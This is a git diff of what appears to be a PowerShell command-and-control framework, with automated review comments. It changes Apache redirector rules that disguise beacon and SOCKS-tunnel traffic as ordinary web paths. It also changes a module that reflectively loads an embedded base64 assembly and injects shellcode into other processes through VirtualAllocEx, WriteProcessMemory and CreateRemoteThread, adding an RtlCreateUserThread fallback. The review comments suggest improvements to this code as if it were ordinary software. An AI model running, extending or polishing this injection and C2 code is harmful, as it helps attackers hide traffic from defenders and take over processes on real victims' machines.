diff --git a/C2-Server.ps1 b/C2-Server.ps1
index 5dac483..92159bf 100644
--- a/C2-Server.ps1
+++ b/C2-Server.ps1
@@ -479,8 +479,8 @@ netsh http add sslcert ipport=0.0.0.0:443 certhash=REPLACE `"appid={00112233-445
 RewriteEngine On
 Define PoshC2
 Define SharpSocks
-RewriteRule ^/webapp/static(.*) $uri`${PoshC2}/webapp/static`$1 [NC,P]
-RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P]
+RewriteRule ^/webapp/static(.*) $uri`${PoshC2}/webapp/static`$1 [NC,L,P]
+RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,L,P]
 "@
 $customurldef = "No"
 $customurl = Read-Host -Prompt "[3a] Do you want to customize the beacon URLs from the default? [No]"
@@ -489,7 +489,7 @@ RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P]
 $urls = @()
 do {
 $input = (Read-Host "Please enter the URLs you want to use, enter blank entry to finish: images/site/content")
- if ($input -ne '') {$urls += "`"$input`""; $apache += "`nRewriteRule ^/$input(.*) $uri`${PoshC2}/$input`$1 [NC,P]"}
+ if ($input -ne '') {$urls += "`"$input`""; $apache += "`nRewriteRule ^/$input(.*) $uri`${PoshC2}/$input`$1 [NC,L,P]"}
 } until ($input -eq '')
 [string]$urlstring = $null
 
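Review bot: Adding `L` to rules that already carry `P` changes nothing, because per the mod_rewrite flag documentation the proxy flag itself already implies last-rule behaviour; the same applies to the `[NC,L,P]` edits in the -489, -500 and -528 hunks of this file. If the intent was to stop later rules from being evaluated, that was already the case before this commit, so the observed behaviour should be re-checked against whatever problem motivated the change. If the explicit flag is kept for readability, a comment above the here-string such as `# [P] already implies [L]; kept explicit for clarity` would stop a later reader from "fixing" it back.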
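Review bot: `$input` from Read-Host is interpolated unescaped into both the regex and the proxy target of the generated RewriteRule on the `+ if ($input -ne '')` line, so a value containing regex metacharacters, whitespace or a leading slash yields a rule that never matches or a config that fails to load. An allow-list check before the append, e.g. `if ($input -ne '' -and $input -notmatch '^[A-Za-z0-9_./-]+$') { Write-Warning "Unsupported characters in path: $input"; continue }`, rejects such entries and re-prompts. `$input` is also a PowerShell automatic variable, so a dedicated name such as `$customPath` would avoid shadowing it. The do/until loop and the `$apache` here-string it appends to begin outside the hunk.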
@@ -500,15 +500,15 @@ RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P]
 RewriteEngine On
 Define PoshC2
 Define SharpSocks
-RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,P]
-RewriteRule ^/images/static/content/(.*) $uri`${PoshC2}/images/static/content/`$1 [NC,P]
-RewriteRule ^/news/(.*) $uri`${PoshC2}/news/`$1 [NC,P]
-RewriteRule ^/webapp/static/(.*) $uri`${PoshC2}/webapp/static/`$1 [NC,P]
-RewriteRule ^/images/prints/(.*) $uri`${PoshC2}/images/prints/`$1 [NC,P]
-RewriteRule ^/wordpress/site/(.*) $uri`${PoshC2}/wordpress/site/`$1 [NC,P]
-RewriteRule ^/true/images/77/(.*) $uri`${PoshC2}/true/images/77/`$1 [NC,P]
-RewriteRule ^/holdings/office/images/(.*) $uri`${PoshC2}/holdings/office/images/`$1 [NC,P]
-RewriteRule ^/steam(.*) $uri`${PoshC2}/steam`$1 [NC,P]
+RewriteRule ^/connect(.*) $uri`${PoshC2}/connect`$1 [NC,L,P]
+RewriteRule ^/images/static/content/(.*) $uri`${PoshC2}/images/static/content/`$1 [NC,L,P]
+RewriteRule ^/news/(.*) $uri`${PoshC2}/news/`$1 [NC,L,P]
+RewriteRule ^/webapp/static/(.*) $uri`${PoshC2}/webapp/static/`$1 [NC,L,P]
+RewriteRule ^/images/prints/(.*) $uri`${PoshC2}/images/prints/`$1 [NC,L,P]
+RewriteRule ^/wordpress/site/(.*) $uri`${PoshC2}/wordpress/site/`$1 [NC,L,P]
+RewriteRule ^/true/images/77/(.*) $uri`${PoshC2}/true/images/77/`$1 [NC,L,P]
+RewriteRule ^/holdings/office/images/(.*) $uri`${PoshC2}/holdings/office/images/`$1 [NC,L,P]
+RewriteRule ^/steam(.*) $uri`${PoshC2}/steam`$1 [NC,L,P]
 "@
 }
 
@@ -528,11 +528,11 @@ RewriteRule ^/steam(.*) $uri`${PoshC2}/steam`$1 [NC,P]
 $socksurlstring = '"sitemap/api/push","visitors/upload/map","printing/images/bin/logo","update/latest/traffic","saml/stats/update/push"'
 $apache += @"
-RewriteRule ^/sitemap/api/push(.*) $uri`${SharpSocks}/sitemap/api/push`$1 [NC,P]
-RewriteRule ^/visitors/upload/map(.*) $uri`${SharpSocks}/visitors/upload/map`$1 [NC,P]
-RewriteRule ^/printing/images/bin/logo(.*) $uri`${SharpSocks}/printing/images/bin/logo`$1 [NC,P]
-RewriteRule ^/update/latest/traffic(.*) $uri`${SharpSocks}/update/latest/traffic`$1 [NC,P]
-RewriteRule ^/saml/stats/update/push(.*) $uri`${SharpSocks}/saml/stats/update/push`$1 [NC,P]
+RewriteRule ^/sitemap/api/push(.*) $uri`${SharpSocks}/sitemap/api/push`$1 [NC,L,P]
+RewriteRule ^/visitors/upload/map(.*) $uri`${SharpSocks}/visitors/upload/map`$1 [NC,L,P]
+RewriteRule ^/printing/images/bin/logo(.*) $uri`${SharpSocks}/printing/images/bin/logo`$1 [NC,L,P]
+RewriteRule ^/update/latest/traffic(.*) $uri`${SharpSocks}/update/latest/traffic`$1 [NC,L,P]
+RewriteRule ^/saml/stats/update/push(.*) $uri`${SharpSocks}/saml/stats/update/push`$1 [NC,L,P]
 "@
 }
diff --git a/Modules/Inject-Shellcode.ps1 b/Modules/Inject-Shellcode.ps1
index 3884dae..a7f8841 100644
--- a/Modules/Inject-Shellcode.ps1
+++ b/Modules/Inject-Shellcode.ps1
@@ -20,7 +20,7 @@ Inject-Shellcode -x86 -Shellcode (GC C:\Temp\Shellcode.bin -Encoding byte) -Proc
 #>
-$p = "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"
+$p = "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"
 $dl = [System.Convert]::FromBase64String($p)
 $a = [System.Reflection.Assembly]::Load($dl)
 $o = New-Object Inject
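Review bot: The only change in this hunk replaces the base64 string assigned to `$p`, which is decoded and loaded as an assembly via `[System.Reflection.Assembly]::Load` two lines below, and the diff gives a reviewer no way to tell what changed inside the embedded binary. For traceability the commit message should name the source and build step that produced the new blob and record its hash, so the embedded assembly can be reproduced and audited rather than trusted as an opaque string. A comment above the assignment such as `# Embedded assembly built from <source path placeholder>; rebuild it rather than editing this string` would document the provenance for future changes.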
@@ -57,13 +57,34 @@ while( $zz.ToInt32() -lt $max.ToInt32() )
 if( $x.ToInt32() -ne $nul.ToInt32() ){ break }
 $zz = [Int32]$zz + $Shellcode.Length
 }
+echo "VirtualAllocEx"
+echo "[+] $x"
 if( $x.ToInt32() -gt $nul.ToInt32() )
 {
 $hg = [Runtime.InteropServices.Marshal]::AllocHGlobal($Shellcode.Length)
- [Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length)|Out-Null
- [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0)|Out-Null
- [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0)|Out-Null
+ [Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $hg, $Shellcode.Length)
+ $s = [Inject]::WriteProcessMemory($phandle,[IntPtr]($x.ToInt32()),$hg, $Shellcode.Length,0)
+ echo "WriteProcessMemory"
+ echo "[+] $s"
+ $e = [Inject]::CreateRemoteThread($phandle,0,0,[IntPtr]$x,0,0,0)
+ echo "CreateRemoteThread"
+ echo "[+] $e"
+
+ if ($e -eq 0) {
+ $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ echo "[-] Failed using CreateRemoteThread"
+ echo "[-] LastError: $Lasterror"
+ echo ""
+ $TokenHandle = [IntPtr]::Zero
+ $c = [Inject]::RtlCreateUserThread($phandle,0,0,0,0,0,[IntPtr]$x,0,[ref] $TokenHandle,0)
+ echo "RtlCreateUserThread"
+ echo "[+] $c"
+ }
+
+ $Lasterror = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
+ echo "LastError: $Lasterror"
 }
+ }
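Review bot: The buffer obtained from `AllocHGlobal` on the `$hg =` line is never released on any path through the block, and the new code keeps that leak while adding more exit paths; a `[Runtime.InteropServices.Marshal]::FreeHGlobal($hg)` as the last statement of the `if( $x.ToInt32() -gt ...)` block would close it. The added `echo` calls are `Write-Output`, so every status string now goes into the pipeline and becomes part of what callers of this script receive; `Write-Host` or `Write-Verbose` would keep diagnostics out of the return stream. The final added `}` closes a scope whose opening is outside the hunk, so brace balance of the whole file should be checked; the enclosing function starts and its remaining body, if any, ends outside this hunk.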